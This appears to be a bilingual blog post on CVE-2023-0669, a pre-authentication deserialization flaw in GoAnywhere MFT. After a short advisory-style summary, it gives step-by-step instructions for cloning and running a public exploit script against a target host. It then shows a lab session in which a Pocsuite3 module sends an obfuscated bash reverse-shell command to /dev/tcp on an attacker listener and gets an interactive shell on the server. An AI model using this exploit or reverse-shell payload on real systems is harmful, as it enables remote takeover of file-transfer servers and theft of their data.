CVE-2023-0669 GoAnywhere MFT 反序列化 - Je Yiuwai's Blog

CVE-2023-0669是一个GoAnywhere MFT反序列化漏洞，由于反序列化一个任意攻击者控制的对象，在License Response Servlet中存在一个预先认证的命令注入漏洞。攻击者可以利用该漏洞在受影响的系统上执行任意代码，从而导致系统被完全控制。该漏洞影响版本为7.1.2之前，不包括7.1.2。

CVE-2023-0669 is a GoAnywhere MFT deserialization vulnerability that exists in the License Response Servlet due to a pre-authenticated command injection vulnerability that allows an attacker to execute arbitrary code on the affected system by deserializing an object controlled by the attacker. The vulnerability affects versions prior to 7.1.2.

该漏洞可能会对企业级文件传输软件GoAnywhere MFT的安全性造成严重威胁。攻击者可以通过利用该漏洞来窃取敏感数据、篡改数据、破坏系统等。因此，用户需要及时采取措施来保护系统安全。

The vulnerability poses a serious threat to the security of enterprise-level file transfer software GoAnywhere MFT, as attackers can exploit it to steal sensitive data, tamper with data, and compromise systems. Therefore, users need to take measures promptly to protect their systems.

官方已经发布了安全通告，并提供了初步检查方法。用户可以检查userdata/logs日志中是否有特定字符串出现来判断系统是否受到此漏洞的影响。如果无法更新补丁，建议采取其他安全措施来保护系统安全。

The official security advisory has been released, and preliminary inspection methods have been provided. Users can check whether their systems are affected by the vulnerability by looking for specific strings in the userdata/logs log. If patches cannot be applied, it is recommended to take other security measures to protect the system.

总之，CVE-2023-0669是一个需要引起用户重视的反序列化漏洞，用户需要及时更新到最新版本，并检查系统是否受到此漏洞的影响。同时，建议用户加强对GoAnywhere MFT等企业级软件的安全管理，采取多层次的安全措施来保护系统安全。

In summary, CVE-2023-0669 is a deserialization vulnerability that requires users' attention. Users need to update to the latest version promptly and check whether their systems are affected by the vulnerability. Additionally, it is recommended that users strengthen the security management of enterprise-level software such as GoAnywhere MFT and take multi-layered security measures to protect their systems.

该Exploit是一个基于Python的脚本，用于利用GoAnywhere MFT v6.7.9594及以下版本中的漏洞CVE-2023-0669。

该漏洞是由于GoAnywhere MFT在处理加密的Bundle请求时存在安全问题，攻击者可以发送特制的请求，并在目标服务器上执行任意代码。

1.克隆本仓库

git clone https://github.com/Avento/CVE-2023-0669.git

2.进入CVE-2023-0669目录

cd CVE-2023-0669

3.安装依赖库requests和cryptography

pip install requests cryptography

4.运行Exploit

python CVE-2023-0669.py --host <目标服务器IP>

• 运行该Exploit需要合法的访问权限，且不应用于非法用途。
• 由于该Exploit的执行会对目标服务器造成风险，因此使用者需要对其风险和后果自行负责。

This Exploit is a Python script used to exploit the vulnerability CVE-2023-0669 in GoAnywhere MFT v6.7.9594 and earlier versions.

This vulnerability exists because of a security issue in processing encrypted Bundle requests in GoAnywhere MFT. An attacker can send a specially crafted request to execute arbitrary code on the target server.

1. Clone this repository.

git clone https://github.com/Avento/CVE-2023-0669.git

1. Enter the directory.

cd CVE-2023-0669

1. Install the dependencies of requests and cryptography.

pip install requests cryptography

1. Run the Exploit.

python CVE-2023-0669.py --host <target IP>

• Running this Exploit requires legal access rights and should not be used for illegal purposes.
• As the execution of this Exploit poses a risk to the target server, the user is solely responsible for its risks and consequences.

$ python3 CVE-2023-0669.py --host 192.168.47.179:8000
Exploit Success ~

Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > check
[11:10:53] [INFO] pocsusite got a total of 1 tasks
[11:10:53] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
[11:10:53] [+] Version : 7.0.3
[11:10:53] [INFO] Scan completed,ready to print

+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
| target-url                 |                           poc-name                           |     poc-id    |   component    |         version          |  status |
----------+---------+
| http://192.168.47.179:8000 | CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化 | CVE-2023-0669 | GoAnywhere MFT | 7.1.2 之前，不 包括 7.1.2 | success |
+----------------------------+--------------------------------------------------------------+---------------+----------------+--------------------------+---------+
success : 1 / 1
Pocsuite3 (pocs\Java_GoAnywhere_CVE-2023-0669) > shell
[11:11:55] [INFO] pocsusite got a total of 1 tasks
[11:11:55] [INFO] running poc:'CVE-2023-0669 GoAnywhere MFT LicenseResponseServlet 反序列化' target 'http://192.168.47.179:8000'
/bin/bash -c bash$IFS-i$IFS>&$IFS/dev/tcp/192.168.47.1/6666<&1
[11:11:55] [*] listening on 0.0.0.0:6666
[11:11:56] [+] new connection established from 192.168.47.179
[11:11:56] [INFO] Scan completed,ready to print
[11:11:56] [INFO] connect back ip: 192.168.47.1    port: 6666
[11:11:56] [INFO] watting for shell connect to pocsuite
Now Connected: 192.168.47.179
SHELL (192.168.47.179) > id
bash: cannot set terminal process group (20029): Inappropriate ioctl for device
bash: no job control in this shell
ubuntu@ubuntu:~/HelpSystems/GoAnywhere$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)

Author：Je Yiuwai edit by xiaomi pad 6 pro